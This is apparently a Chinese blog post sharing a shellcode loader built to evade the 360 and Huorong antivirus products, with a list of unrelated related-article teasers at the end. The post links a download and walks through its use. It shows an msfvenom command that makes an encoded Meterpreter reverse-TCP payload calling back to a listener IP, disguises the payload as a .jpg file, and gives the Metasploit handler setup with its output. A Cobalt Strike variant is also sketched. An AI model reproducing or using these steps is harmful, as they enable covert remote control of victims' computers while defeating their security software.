【工具分享】免杀360&火绒的shellcode加载器

简介: 【工具分享】免杀360&火绒的shellcode加载器

1. 免杀效果


shellcode加载器目前可以过360&火绒Windows Defender没戏。。。

代码和思路暂不开源!

你可以在我的GitHub上下载该工具:https://github.com/crow821/crowsec/tree/master/BypassAV_360_huornog

如果你访问GitHub困难,你可以在乌鸦安全公众号后台直接回复关键字:加载器 下载!

方法:生成msfcsshellcode原生格式,命名为crowsec.jpg(这个是写死的),将其和crowsec_shelllcodeBypass.exe(这个名字可以修改的)放在一个目录下,直接双击即可!


1.1 当前



1.2 半年前


这个数据已没有意义。


这个shellcode加载器工具是我在2021-06-21号做的,优化之后VT查杀为0/68,一个月之后我再去检查,甚至到现在去检查,当前的VT查杀依旧为0/68

2021-06-21是能过火绒360Windows Defender(关闭自动发送可疑样本)

前几天在测试的时候,发现过不了Windows Defender,今天稍微优化了一下,发现还是过不了Windows Defender,主要原因是识别了msf的部分特征!!!

鉴于目前已经有了其他的免杀方案,所以在这里就把工具分享出来(🐶),至少还能过360火绒。(放出来之后,基本上几小时就没用了,所以仅供参考!)。


查询时间:2022.01.19


2. 使用方法


2.1. msf上线


在这里使用msfvenon生成shellcode,为了好点的效果,这里使用shikata_ga_nai 编码器器对shellcode进行混淆编码,编码之后的shellcode并不是所有杀软都识别不出来,详情可以看我以前的文章:

老树开新花之shellcode_launcher免杀Windows Defender


msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 7 -b '\x00'  lhost=10.211.55.2 lport=1234  -f raw -o crowsec.jpg

使用msf进行监听:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload  windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:1234


2.1.1 360

i

2.1.2 Windows Defender

被杀

2.1.3 火绒


2.2 Cobalt Strike上线


在这里只说思路,能够过火绒360,但是不能过Windows Defender,同样的问题:特征出现在shellcode上面。

将文件保存为crowsec.jpg(下图是一个示例,主要是太累了,不想换了。。。)

现将生成的bin文件修改为png文件,然后双击上线操作

但是这里可以发现,当前的payload已经被标记特征,直接被杀,但是免杀360火绒是不影响的。

相关文章
|
前端开发
css如何创建视频背景
css如何创建视频背景
466 0
|
存储 PHP 数据安全/隐私保护
Ueditor结合七牛云存储上传图片、附件和图片在线管理的实现和最新更新
最新下载地址: https://github.com/widuu/qiniu_ueditor_1.4.3 Ueditor七牛云存储版本 注意事项 老版本请查看 : https://github.com/widuu/qiniu_ueditor_1.
3363 0
|
8月前
|
存储 安全 大数据
网安工程师必看!AiPy解决fscan扫描数据整理难题—多种信息快速分拣+Excel结构化存储方案
作为一名安全测试工程师,分析fscan扫描结果曾是繁琐的手动活:从海量日志中提取开放端口、漏洞信息和主机数据,耗时又易错。但现在,借助AiPy开发的GUI解析工具,只需喝杯奶茶的时间,即可将[PORT]、[SERVICE]、[VULN]、[HOST]等关键信息智能分类,并生成三份清晰的Excel报表。告别手动整理,大幅提升效率!在安全行业,工具党正碾压手动党。掌握AiPy,把时间留给真正的攻防实战!官网链接:https://www.aipyaipy.com,解锁更多用法!
|
JavaScript 前端开发 API
Vue.js:现代前端开发的强大框架
【10月更文挑战第11天】Vue.js:现代前端开发的强大框架
439 41
|
机器学习/深度学习 前端开发 Linux
技术心得:分析Windows的死亡蓝屏(BSOD)机制
技术心得:分析Windows的死亡蓝屏(BSOD)机制
|
Python
还不会免费将PDF转为Word?你可以试试这3种工具!
还不会免费将PDF转为Word?你可以试试这3种工具!
627 0
|
运维 Kubernetes Linux
10分钟搭建Kubernetes容器集群平台(kubeadm)
10分钟搭建Kubernetes容器集群平台(kubeadm)
|
应用服务中间件 nginx Python
nginx-upload-module模块实现文件断点续传_nginx upload module 断点续传 进度(1)
nginx-upload-module模块实现文件断点续传_nginx upload module 断点续传 进度(1)
|
开发框架 .NET 数据库
D8016 “/ZI”和“/clr”命令行选项不兼容
D8016 “/ZI”和“/clr”命令行选项不兼容
|
存储 安全 Shell
CVE-2021-22005-VMware vCenter漏洞学习
CVE-2021-22005-VMware vCenter漏洞学习
664 0